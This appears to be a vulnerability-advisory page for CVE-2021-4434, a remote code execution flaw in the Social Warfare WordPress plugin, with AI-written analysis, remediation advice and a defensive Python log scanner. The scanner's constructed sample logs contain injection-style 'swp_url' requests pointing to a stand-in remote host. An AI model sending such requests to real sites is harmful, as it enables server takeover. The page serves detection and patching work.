Social Warfare
CVE-2021-4434
Severity: CRITICAL (primary rating from NVD, the only source for this CVE)
CVSS vector (NVD): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Description (CVE.org)
The Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swp_url' parameter. This allows attackers to execute code on the server.
Analysis (AI)
Remote code execution in the Social Warfare WordPress plugin (versions ≤ 3.5.2) allows unauthenticated attackers to run arbitrary code on the server via the 'swp_url' parameter. Publicly available exploit code exists and the issue carries a maximum CVSS 10.0 with scope change, while the EPSS score of 7.99% (92nd percentile) signals meaningfully elevated exploitation interest. The flaw was reported by Wordfence and primarily threatens WordPress sites still running this abandoned/legacy plugin version.
Technical Context (AI)
Social Warfare is a popular social-sharing plugin for WordPress published by warfareplugins. The CPE cpe:2.3:a:warfareplugins:social_warfare confirms the affected product line and the wordpress target platform. The root cause maps to CWE-94 (Improper Control of Generation of Code, i.e., Code Injection): the plugin processes the 'swp_url' parameter in a way that allows attacker-supplied content to be interpreted and executed as code on the server, almost certainly by fetching a remote payload and evaluating it within the PHP runtime. Because WordPress plugins run with full PHP privileges of the web server, code injection inside the plugin translates directly into arbitrary command execution in the WordPress context.
Remediation (AI)
Upgrade the Social Warfare plugin to a version newer than 3.5.2 as published on the WordPress plugin repository. The advisory data does not specify an exact fix version (a patch is listed as available per the vendor advisory), so administrators should verify the latest release directly from warfareplugins before deploying. If an immediate upgrade is not possible, deactivate and remove the Social Warfare plugin entirely; this eliminates the vulnerable code path at the cost of losing the site's social-sharing widgets. As a temporary compensating control, use a WAF or web server rule (ModSecurity, Wordfence, Cloudflare) to block requests containing the 'swp_url' parameter to plugin endpoints, accepting that this may break legitimate plugin functionality, and restrict administrative and plugin endpoints by IP where feasible to reduce exposure until the plugin is updated or removed.
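To check whether a site has already been probed while the WAF rule above is being rolled out, the following added example (not code from vuln.today or the Social Warfare project) scans web server access-log lines for requests whose query string carries the 'swp_url' parameter named in the advisory. It assumes the combined log format and matches on the parameter alone, because the page does not name the plugin endpoint path; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client, identity, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /?swp_url=http://example.invalid/x HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-login.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?swp%5Furl=http%3A%2F%2Fexample.invalid%2Fy HTTP/1.1" 500 0 "-" "python-requests/2.31"
192.0.2.9 - - [10/Oct/2023:13:58:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 33 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def has_swp_url(target):
    """True when the request target's query string carries a 'swp_url' parameter.
    parse_qs percent-decodes names once, so 'swp%5Furl' is caught; a double-encoded
    name is not, and PHP's $_GET keys are case-sensitive, so the match is exact."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return "swp_url" in params

def find_suspicious(lines):
    """Collect (ip, method, target, status) for every request carrying swp_url.
    Caveat: access logs do not record POST bodies, so a parameter sent in a form
    body is invisible here; only the WAF rule in front of the plugin sees that."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and has_swp_url(rec["target"]):
            hits.append((rec["ip"], rec["method"], rec["target"], rec["status"]))
    return hits

def count_by_ip(hits):
    """Number of flagged requests per client address, for triage ordering."""
    counts = {}
    for ip, _method, _target, _status in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts

if __name__ == "__main__":
    flagged = find_suspicious(SAMPLE_LOG.splitlines())
    for hit in flagged:
        print("swp_url request:", hit)
    print("per-IP counts:", count_by_ip(flagged))
```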